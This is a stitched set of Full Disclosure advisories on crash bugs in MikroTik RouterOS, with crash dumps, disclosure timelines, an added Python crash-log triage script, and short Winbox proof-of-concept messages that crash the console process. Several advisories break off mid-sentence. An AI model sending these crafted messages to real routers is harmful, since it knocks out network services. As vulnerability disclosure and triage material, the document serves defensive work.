2020.06.04-17:56:52.31@0: 00 20 66 77 00 20 66 77 c8 37 ee 7f 77 60 65
77 06 00 00 00 00 22 66 77 20 00 00 00 00 00 00 00
2020.06.04-17:56:52.31@0: 15 00 00 00 28 38 ee 7f c4 37 ee 7f e4 ea 70
77 01 00 00 00 e4 ea 70 77 15 00 00 00 01 00 fe 00
2020.06.04-17:56:52.31@0:
2020.06.04-17:56:52.31@0: code: 0x7765a55b
2020.06.04-17:56:52.31@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7
d8

This vulnerability was initially found in long-term 6.44.6, and was fixed
in stable 6.47.


Solution

[FD] Three vulnerabilities found in MikroTik's RouterOS

2020-08-29 Thread Q C
Advisory: three vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as
switches, routers and access points.


Description of vulnerabilities
==

1. NULL pointer dereference
The dot1x process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the dot1x
process due to NULL pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-14:51:29.47@0:
2020.06.04-14:51:29.47@0:
2020.06.04-14:51:29.81@0: /nova/bin/dot1x
2020.06.04-14:51:29.81@0: --- signal=11

2020.06.04-14:51:29.81@0:
2020.06.04-14:51:29.81@0: eip=0x776a51e5 eflags=0x00010202
2020.06.04-14:51:29.81@0: edi=0x7fc51064 esi=0x08062ed0 ebp=0x7fc50f78
esp=0x7fc50f6c
2020.06.04-14:51:29.81@0: eax=0x ebx=0x776ad4ec ecx=0x
edx=0x08062e28
2020.06.04-14:51:29.81@0:
2020.06.04-14:51:29.81@0: maps:
2020.06.04-14:51:29.81@0: 08048000-0805f000 r-xp  00:0c 1064
/nova/bin/dot1x
2020.06.04-14:51:29.81@0: 7764a000-7767f000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-14:51:29.81@0: 77683000-7769d000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-14:51:29.81@0: 7769e000-776ad000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-14:51:29.81@0: 776ae000-776b4000 r-xp  00:0c 951
   /lib/liburadius.so
2020.06.04-14:51:29.81@0: 776b5000-776bd000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-14:51:29.81@0: 776be000-776db000 r-xp  00:0c 947
   /lib/libucrypto.so
2020.06.04-14:51:29.81@0: 776dc000-77728000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-14:51:29.81@0: 7772e000-77735000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-14:51:29.81@0:
2020.06.04-14:51:29.81@0: stack: 0x7fc52000 - 0x7fc50f6c
2020.06.04-14:51:29.81@0: 00 00 00 00 90 27 06 08 e4 8a 72 77 a8 0f c5
7f 2e be 6f 77 90 27 06 08 d0 2e 06 08 28 2e 06 08
2020.06.04-14:51:29.81@0: 28 2e 06 08 a4 0f c5 7f f0 da 6b 77 05 00 00
00 f0 da 6b 77 e0 2d 06 08 64 10 c5 7f e8 0f c5 7f
2020.06.04-14:51:29.81@0:
2020.06.04-14:51:29.81@0: code: 0x776a51e5
2020.06.04-14:51:29.81@0: 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75 08
e8

This vulnerability was initially found in stable 6.46.3, and was fixed in
stable 6.47.

2. division by zero
The netwatch process suffers from a division-by-zero vulnerability. By
sending a crafted packet, an authenticated remote user can crash the
netwatch process due to arithmetic exception.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0: /ram/pckg/advanced-tools/nova/bin/netwatch
2020.06.04-16:25:57.65@0: --- signal=8

2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0: eip=0x0804c6d7 eflags=0x00010246
2020.06.04-16:25:57.65@0: edi=0x5ed9208c esi=0x ebp=0x73f8
esp=0x73b0
2020.06.04-16:25:57.65@0: eax=0x ebx=0x08051020 ecx=0x
edx=0x
2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0: maps:
2020.06.04-16:25:57.65@0: 08048000-0804d000 r-xp  00:1a 14
/ram/pckg/advanced-tools/nova/bin/netwatch
2020.06.04-16:25:57.65@0: 77f41000-77f76000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-16:25:57.65@0: 77f7a000-77f94000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-16:25:57.65@0: 77f95000-77fa4000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-16:25:57.65@0: 77fa5000-77ff1000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-16:25:57.65@0: 77ff7000-77ffe000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0: stack: 0x8000 - 0x73b0
2020.06.04-16:25:57.65@0: d8 f4 ff 7f 80 f6 ff 7f 06 00 00 00 d0 f3 ff
7f 84 e5 04 08 0b 00 ff 08 e8 f3 ff 7f 06 00 00 00
2020.06.04-16:25:57.65@0: 20 10 05 08 e4 1a ff 77 f8 f3 ff 7f 22 2c fc
77 d8 f4 ff 7f 0b 00 ff 08 08 f4 ff 7f e4 1a ff 77
2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0: code: 0x804c6d7
2020.06.04-16:25:57.65@0: f7 f6 8b 53 30 39 c2 73 6e 42 89 53 30 83 ec
0c

This vulnerability was initially found in stable 6.46.2, and was fixed in
stable 6.47.

3. memory corruption
The wireless process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the
wireless process due to invalid memory 

[FD] Two vulnerabilities found in MikroTik's RouterOS

2020-08-14 Thread Q C
Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as
switches, routers and access points.


Description of vulnerabilities
==

1. NULL pointer dereference
The igmpproxy process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the
igmpproxy process due to NULL pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: /ram/pckg/multicast/nova/bin/igmpproxy
2020.06.04-17:44:27.12@0: --- signal=11

2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: eip=0x08050a8d eflags=0x00010206
2020.06.04-17:44:27.12@0: edi=0x7fa9331c esi=0x7fa932b8 ebp=0x7fa932a8
esp=0x7fa9326c
2020.06.04-17:44:27.12@0: eax=0x080581bc ebx=0x ecx=0x000b
edx=0x
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: maps:
2020.06.04-17:44:27.12@0: 08048000-08053000 r-xp  00:13 16
/ram/pckg/multicast/nova/bin/igmpproxy
2020.06.04-17:44:27.12@0: 7770b000-7774 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-17:44:27.12@0: 77744000-7775e000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-17:44:27.12@0: 7775f000-7776e000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-17:44:27.12@0: 7776f000-7000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-17:44:27.12@0: 8000-777c4000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-17:44:27.12@0: 777ca000-777d1000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: stack: 0x7fa94000 - 0x7fa9326c
2020.06.04-17:44:27.12@0: 01 00 00 00 e8 7f 05 08 10 00 00 00 98 32 a9
7f 11 00 00 00 78 57 05 08 14 33 a9 7f a8 32 a9 7f
2020.06.04-17:44:27.12@0: 67 29 79 77 04 5d 05 08 6c 25 79 77 d8 32 a9
7f e0 57 05 08 b8 32 a9 7f 1c 33 a9 7f d8 32 a9 7f
2020.06.04-17:44:27.12@0:
2020.06.04-17:44:27.12@0: code: 0x8050a8d
2020.06.04-17:44:27.12@0: 8b 03 ff 30 6a 01 56 e8 77 a8 ff ff 83 c4 0c
0f

This vulnerability was initially found in long-term 6.44.6, and was fixed
in stable 6.47.

2. reachable assertion failure
The ipsec process suffers from an assertion failure vulnerability. There is
a reachable assertion in the ipsec process. By sending a crafted packet, an
authenticated remote user can crash the ipsec process due to assertion
failure.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: /ram/pckg/security/nova/bin/ipsec
2020.06.04-18:25:16.04@0: --- signal=6

2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: eip=0x7748155b eflags=0x0246
2020.06.04-18:25:16.04@0: edi=0x0001 esi=0x77489200 ebp=0x7f8fa450
esp=0x7f8fa448
2020.06.04-18:25:16.04@0: eax=0x ebx=0x0291 ecx=0x0291
edx=0x0006
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: maps:
2020.06.04-18:25:16.04@0: 08048000-080b5000 r-xp  00:11 42
/ram/pckg/security/nova/bin/ipsec
2020.06.04-18:25:16.04@0: 77453000-77488000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-18:25:16.04@0: 7748c000-774a6000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-18:25:16.04@0: 774a7000-774b6000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-18:25:16.04@0: 774b7000-774b9000 r-xp  00:0c 959
   /lib/libdl-0.9.33.2.so
2020.06.04-18:25:16.04@0: 774bb000-774d r-xp  00:1f 15
/ram/pckg/dhcp/lib/libudhcp.so
2020.06.04-18:25:16.04@0: 774d2000-774d8000 r-xp  00:0c 951
   /lib/liburadius.so
2020.06.04-18:25:16.04@0: 774d9000-77524000 r-xp  00:0c 956
   /lib/libssl.so.1.0.0
2020.06.04-18:25:16.04@0: 77528000-7753 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-18:25:16.04@0: 77531000-7757d000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-18:25:16.04@0: 7758-7759d000 r-xp  00:0c 947
   /lib/libucrypto.so
2020.06.04-18:25:16.04@0: 7759e000-776fb000 r-xp  00:0c 954
   /lib/libcrypto.so.1.0.0
2020.06.04-18:25:16.04@0: 7770e000-77715000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: stack: 0x7f8fb000 - 0x7f8fa448
2020.06.04-18:25:16.04@0: 00 90 48 77 00 90 48 77 88 a4 8f 7f 77 d0 47
77 06 00 00 00 00 92 48 77 20 00 00 00 

[FD] Three vulnerabilities found in MikroTik's RouterOS

2020-07-24 Thread Q C
Advisory: three vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as
switches, routers and access points.


Description of vulnerabilities
==

1. Memory corruption vulnerability
The diskd process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the diskd
process due to invalid memory access.

Against stable 6.44.3, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: /nova/bin/diskd
2020.06.04-14:18:22.55@0: --- signal=11

2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: eip=0x776cd1db eflags=0x00010202
2020.06.04-14:18:22.55@0: edi=0x08056760 esi=0x08056790 ebp=0x7fd40b78
esp=0x7fd40b6c
2020.06.04-14:18:22.55@0: eax=0x001b ebx=0x776d54ec ecx=0x776d54ec
edx=0x20fe0010
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: maps:
2020.06.04-14:18:22.55@0: 08048000-08052000 r-xp  00:0c 1131
/nova/bin/diskd
2020.06.04-14:18:22.55@0: 77672000-776a7000 r-xp  00:0c 996
   /lib/libuClibc-0.9.33.2.so
2020.06.04-14:18:22.55@0: 776ab000-776c5000 r-xp  00:0c 992
   /lib/libgcc_s.so.1
2020.06.04-14:18:22.55@0: 776c6000-776d5000 r-xp  00:0c 976
   /lib/libuc++.so
2020.06.04-14:18:22.55@0: 776d6000-776de000 r-xp  00:0c 982
   /lib/libubox.so
2020.06.04-14:18:22.55@0: 776df000-7772b000 r-xp  00:0c 978
   /lib/libumsg.so
2020.06.04-14:18:22.55@0: 77731000-77738000 r-xp  00:0c 990
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: stack: 0x7fd41000 - 0x7fd40b6c
2020.06.04-14:18:22.55@0: ec 54 6d 77 1b 00 00 00 88 67 05 08 98 0b d4
7f c6 c6 04 08 88 67 05 08 1b 00 00 00 10 00 fe 20
2020.06.04-14:18:22.55@0: 10 00 fe 20 ec 54 6d 77 f0 ea 6d 77 08 0c d4
7f 6d a9 6d 77 88 67 05 08 1b 00 00 00 05 00 00 00
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: code: 0x776cd1db
2020.06.04-14:18:22.55@0: 8b 00 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff
75

This vulnerability was initially found in long-term 6.44.5, and has been
fixed in stable 6.47.

2. NULL pointer dereference vulnerability
The graphing process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the
graphing process due to NULL pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: /nova/bin/graphing
2020.06.04-15:12:41.47@0: --- signal=11

2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: eip=0x080521e2 eflags=0x00010202
2020.06.04-15:12:41.47@0: edi=0x080610a0 esi=0x08061cb8 ebp=0x7fa8acd8
esp=0x7fa8acb0
2020.06.04-15:12:41.47@0: eax=0x08061db8 ebx=0x7fa8ad0c ecx=0x
edx=0x08061ce8
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: maps:
2020.06.04-15:12:41.47@0: 08048000-0805c000 r-xp  00:0c 1038
/nova/bin/graphing
2020.06.04-15:12:41.47@0: 77651000-77686000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-15:12:41.47@0: 7768a000-776a4000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-15:12:41.47@0: 776a5000-776b4000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-15:12:41.47@0: 776b5000-776bd000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-15:12:41.47@0: 776be000-7770a000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-15:12:41.47@0: 7770d000-77717000 r-xp  00:0c 961
   /lib/libm-0.9.33.2.so
2020.06.04-15:12:41.47@0: 7771c000-77723000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: stack: 0x7fa8b000 - 0x7fa8acb0
2020.06.04-15:12:41.47@0: e8 1c 06 08 b8 1d 06 08 00 00 00 00 01 00 00
00 0c ad a8 7f 5b 00 00 00 b8 98 05 08 b8 98 05 08
2020.06.04-15:12:41.47@0: f0 da 6b 77 0c ad a8 7f 28 ad a8 7f 3a bc 6b
77 b8 1c 06 08 0c ad a8 7f 05 00 00 00 a0 10 06 08
2020.06.04-15:12:41.47@0:
2020.06.04-15:12:41.47@0: code: 0x80521e2
2020.06.04-15:12:41.47@0: ff 51 04 83 c4 18 6a 5c 53 e8 a0 9c ff ff 8b
56

This vulnerability was initially found in long-term 6.44.6, and has been
fixed in stable 6.47.

3. Stack exhaustion vulnerability
The net process suffers from a stack exhaustion vulnerability. By sending a
crafted packet to the net process, an authenticated remote user can trigger
a stack 
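
Every crash dump quoted in this thread has the same layout: the process path, the signal, the x86 registers, the r-xp memory maps, a few stack words and the code bytes at eip. The block below is an added example, not part of the advisory and not RouterOS code, that parses that layout and resolves eip to the module containing it, so that dumps collected from many devices can be bucketed by (process, module, offset) instead of by raw address. The sample record is constructed from the diskd dump above with the archive's line wrapping undone and cut to four map entries; the signal-name table, the 0x1000 near-null threshold and the bucket key format are the example's own choices.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

SIGNAL_NAMES = {6: "SIGABRT", 11: "SIGSEGV"}  # Linux x86 numbers seen in these dumps

# Constructed sample: the diskd dump quoted in the advisory above, cut to four map
# entries, with the register and map lines that the mail archive wrapped rejoined.
SAMPLE = """\
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: /nova/bin/diskd
2020.06.04-14:18:22.55@0: --- signal=11
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: eip=0x776cd1db eflags=0x00010202
2020.06.04-14:18:22.55@0: edi=0x08056760 esi=0x08056790 ebp=0x7fd40b78 esp=0x7fd40b6c
2020.06.04-14:18:22.55@0: eax=0x001b ebx=0x776d54ec ecx=0x776d54ec edx=0x20fe0010
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: maps:
2020.06.04-14:18:22.55@0: 08048000-08052000 r-xp  00:0c 1131 /nova/bin/diskd
2020.06.04-14:18:22.55@0: 77672000-776a7000 r-xp  00:0c 996 /lib/libuClibc-0.9.33.2.so
2020.06.04-14:18:22.55@0: 776c6000-776d5000 r-xp  00:0c 976 /lib/libuc++.so
2020.06.04-14:18:22.55@0: 776df000-7772b000 r-xp  00:0c 978 /lib/libumsg.so
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: stack: 0x7fd41000 - 0x7fd40b6c
2020.06.04-14:18:22.55@0: ec 54 6d 77 1b 00 00 00 88 67 05 08 98 0b d4 7f
2020.06.04-14:18:22.55@0:
2020.06.04-14:18:22.55@0: code: 0x776cd1db
2020.06.04-14:18:22.55@0: 8b 00 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75
"""

MapEntry = Tuple[int, int, str, str]  # (start, end, perms, path)

@dataclass
class CrashReport:
    process: str = ""
    signal: int = -1
    registers: Dict[str, int] = field(default_factory=dict)
    maps: List[MapEntry] = field(default_factory=list)
    code_bytes: bytes = b""  # bytes at eip, ready to hand to a disassembler

_LINE = re.compile(r"^\S+@\d+:\s?(.*)$")               # strips the "timestamp@cpu:" prefix
_REG = re.compile(r"\b(e[a-z]{2,5})=0x([0-9a-f]+)\b")   # eip=..., eax=..., eflags=...
_MAP = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+.*?(/\S+)$")
_HEX = re.compile(r"^(?:[0-9a-f]{2}\s*)+$")

def parse_backtrace(text: str) -> CrashReport:
    """Parse one backtrace.log record in the layout quoted by these advisories."""
    rep, section = CrashReport(), None
    for raw in text.splitlines():
        m = _LINE.match(raw.strip())
        if not m or not m.group(1).strip():
            continue
        body = m.group(1).strip()
        if body == "maps:":
            section = "maps"
        elif body.startswith("stack:"):
            section = "stack"  # raw stack words follow; not needed for bucketing
        elif body.startswith("code:"):
            section = "code"
        elif body.startswith("--- signal="):
            rep.signal = int(body.split("=", 1)[1])
        elif section == "maps" and _MAP.match(body):
            g = _MAP.match(body).groups()
            rep.maps.append((int(g[0], 16), int(g[1], 16), g[2], g[3]))
        elif section == "code" and _HEX.match(body):
            rep.code_bytes += bytes.fromhex(body.replace(" ", ""))
        elif section is None and _REG.search(body):
            rep.registers.update({n: int(v, 16) for n, v in _REG.findall(body)})
        elif section is None and body.startswith("/") and not rep.process:
            rep.process = body
    return rep

def locate(rep: CrashReport, addr: int) -> Optional[Tuple[str, int]]:
    """Map an address to (module path, offset into that module), or None if unmapped."""
    for start, end, _perms, path in rep.maps:
        if start <= addr < end:
            return path, addr - start
    return None

def triage(rep: CrashReport) -> Dict[str, object]:
    """Summarise a crash for bucketing: the same (process, module, offset) is the same
    bug; different offsets in one binary (the lcdstat dumps below) are distinct bugs."""
    eip = rep.registers.get("eip", 0)
    module, offset = locate(rep, eip) or ("<unmapped>", eip)
    # Heuristic only: a near-zero data register often accompanies a NULL (or
    # NULL-plus-small-offset) dereference; confirm against the code bytes.
    small = sorted(n for n, v in rep.registers.items()
                   if n not in ("eip", "eflags") and v < 0x1000)
    return {"process": rep.process,
            "signal": SIGNAL_NAMES.get(rep.signal, str(rep.signal)),
            "module": module, "offset": offset,
            "in_main_binary": module == rep.process,
            "near_null_registers": small,
            "bucket": f"{rep.process}|{module}+{offset:#x}"}

if __name__ == "__main__":
    print(triage(parse_backtrace(SAMPLE)))
```

For the sample, eip 0x776cd1db falls inside the /lib/libuc++.so mapping (0x776c6000-0x776d5000) at offset 0x71db, so the faulting instruction is in the C++ runtime library rather than in diskd itself. The first two code bytes, 8b 00, decode to mov eax, [eax], and eax is reported as 0x001b, which is consistent with the invalid memory access the advisory describes; the near-null heuristic flags eax for that reason, as a hint to check, not a verdict.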

[FD] Four vulnerabilities found in MikroTik's RouterOS

2020-07-07 Thread Q C
Advisory: four vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Affected Versions: through stable 6.47
Fixed Versions: stable 6.47
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as
switches, routers and access points.


Description of vulnerabilities
==

These four vulnerabilities were tested only against the MikroTik RouterOS
stable release tree when found. Maybe other release trees also suffer from
these vulnerabilities.

PS: The following three memory corruption vulnerabilities are different.

1. NULL pointer dereference vulnerability
The lcdstat process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the lcdstat
process due to NULL pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: /nova/bin/lcdstat
2020.06.04-15:32:04.67@0: --- signal=11

2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: eip=0x0805a26e eflags=0x00010202
2020.06.04-15:32:04.67@0: edi=0x esi=0x7fbeaedc ebp=0x7fbeae18
esp=0x7fbeadf4
2020.06.04-15:32:04.67@0: eax=0x ebx=0x7fbeb848 ecx=0x0807f14c
edx=0x0001
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: maps:
2020.06.04-15:32:04.67@0: 08048000-0807e000 r-xp  00:0c 1054
/nova/bin/lcdstat
2020.06.04-15:32:04.67@0: 776fd000-77732000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-15:32:04.67@0: 77736000-7775 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-15:32:04.67@0: 77751000-7776 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-15:32:04.67@0: 77761000-77769000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-15:32:04.67@0: 7776a000-777b6000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-15:32:04.67@0: 777bc000-777c3000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: stack: 0x7fbeb000 - 0x7fbeadf4
2020.06.04-15:32:04.67@0: 48 b8 be 7f 18 ae be 7f 95 ab 05 08 a0 e5 07
08 00 00 00 00 4c f1 07 08 48 b8 be 7f dc ae be 7f
2020.06.04-15:32:04.67@0: 00 00 00 00 58 ae be 7f 00 ad 05 08 48 b8 be
7f 00 00 00 00 00 00 00 00 ec 04 76 77 d8 af be 7f
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: code: 0x805a26e
2020.06.04-15:32:04.67@0: 8b 70 fc ff 73 78 e8 1f c0 ff ff 8b 46 10 83
c4

2. NULL pointer dereference vulnerability
The lcdstat process suffers from a memory corruption vulnerability. By
sending a crafted packet, an authenticated remote user can crash the lcdstat
process due to NULL pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: /nova/bin/lcdstat
2020.06.04-15:48:13.77@0: --- signal=11

2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: eip=0x080562c6 eflags=0x00010246
2020.06.04-15:48:13.77@0: edi=0xff00 esi=0x00ff ebp=0x7fd8cb48
esp=0x7fd8cb2c
2020.06.04-15:48:13.77@0: eax=0x ebx=0x ecx=0x
edx=0x
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: maps:
2020.06.04-15:48:13.77@0: 08048000-0807e000 r-xp  00:0c 1054
/nova/bin/lcdstat
2020.06.04-15:48:13.77@0: 776be000-776f3000 r-xp  00:0c 964
   /lib/libuClibc-0.9.33.2.so
2020.06.04-15:48:13.77@0: 776f7000-77711000 r-xp  00:0c 960
   /lib/libgcc_s.so.1
2020.06.04-15:48:13.77@0: 77712000-77721000 r-xp  00:0c 944
   /lib/libuc++.so
2020.06.04-15:48:13.77@0: 77722000-7772a000 r-xp  00:0c 950
   /lib/libubox.so
2020.06.04-15:48:13.77@0: 7772b000-7000 r-xp  00:0c 946
   /lib/libumsg.so
2020.06.04-15:48:13.77@0: d000-77784000 r-xp  00:0c 958
   /lib/ld-uClibc-0.9.33.2.so
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: stack: 0x7fd8d000 - 0x7fd8cb2c
2020.06.04-15:48:13.77@0: 00 00 00 00 00 00 00 01 80 c1 77 77 01 00 00
00 38 d4 d8 7f 50 5f 08 08 a8 5c 08 08 78 cb d8 7f
2020.06.04-15:48:13.77@0: 79 a2 05 08 78 36 08 08 00 00 00 00 00 de 77
77 8f cf d8 7f ff ff ff ff a8 5d 08 08 00 36 08 08
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: code: 0x80562c6
2020.06.04-15:48:13.77@0: 88 1c 02 89 f3 88 5c 02 01 89 fb 88 5c 02 02
05

3. NULL pointer dereference vulnerability
The lcdstat process suffers from a memory corruption vulnerability. By
sending a crafted packet,
an authenticated 

[FD] Two vulnerabilities found in MikroTik's RouterOS

2020-05-12 Thread Q C
Advisory: two vulnerabilities found in MikroTik's RouterOS


Details
===

Product: MikroTik's RouterOS
Affected Versions: until stable 6.45.7 (first vulnerability), until stable
6.46.4 (second vulnerability)
Fixed Versions: stable 6.46.x (first vulnerability), stable 6.46.5 (second
vulnerability)
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team


Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as
switches, routers and access points.


Description of vulnerabilities
==

These two vulnerabilities were tested only against the MikroTik RouterOS
stable release tree when found. Maybe other release trees also suffer from
these vulnerabilities.

1. The cerm process suffers from an uncontrolled resource consumption
issue. By sending a crafted packet, an authenticated remote user can cause
a high cpu load, which may make the device respond slowly or unable to
respond.

2. The traceroute process suffers from a memory corruption issue. By
sending a crafted packet, an authenticated remote user can crash the
traceroute process due to invalid memory access.


Solution


Upgrade to the corresponding latest RouterOS tree version.


References
==

[1] https://mikrotik.com/download/changelogs/stable-release-tree

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


Re: [FD] Two vulnerabilities found in MikroTik's RouterOS

2020-04-14 Thread Q C
[Update 2020/04/14] The latest stable release tree 6.46.5 still suffers
from these two vulnerabilities.

Details
===

Product: MikroTik's RouterOS
Affected Versions: through 6.46.5 (stable release tree)
Fixed Versions: -
Vendor URL: https://mikrotik.com/
Vendor Status: not fixed yet
CVE: -
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team

Poc
===
The following pocs are based on the tool routeros (
https://github.com/tenable/routeros)

1) memory corruption in console process

WinboxMessage msg;
msg.set_to(48, 4);
msg.set_command(0xfe0005);
msg.add_u32(0xfe000c, -1);
msg.add_u32(9, 9);

2) assertion failure in console process

WinboxMessage msg;
msg.set_to(48, 4);
msg.set_command(0xfe0005);
msg.add_u32(0xfe0001, 0);

Disclosure timeline
===
2019/08/23  reported the 2nd issue to the vendor
2019/08/26  reported the 1st issue to the vendor
2019/08/28  vendor reproduced the 1st issue and will fix it as soon as possible
2019/08/30  vendor reproduced the 2nd issue and will fix it as soon as possible
2019/12/02  notified the vendor the 1st issue still exists in version 6.44.6 (2nd issue fixed)
2020/01/06  no response from the vendor, and did the initial disclosure
2020/04/14  re-tested these two issues against the stable 6.46.5, and updated the disclosure



Q C wrote on Mon, 6 Jan 2020 at 7:32 PM:

> Advisory: two vulnerabilities found in MikroTik's RouterOS
>
>
> Details
> ===
>
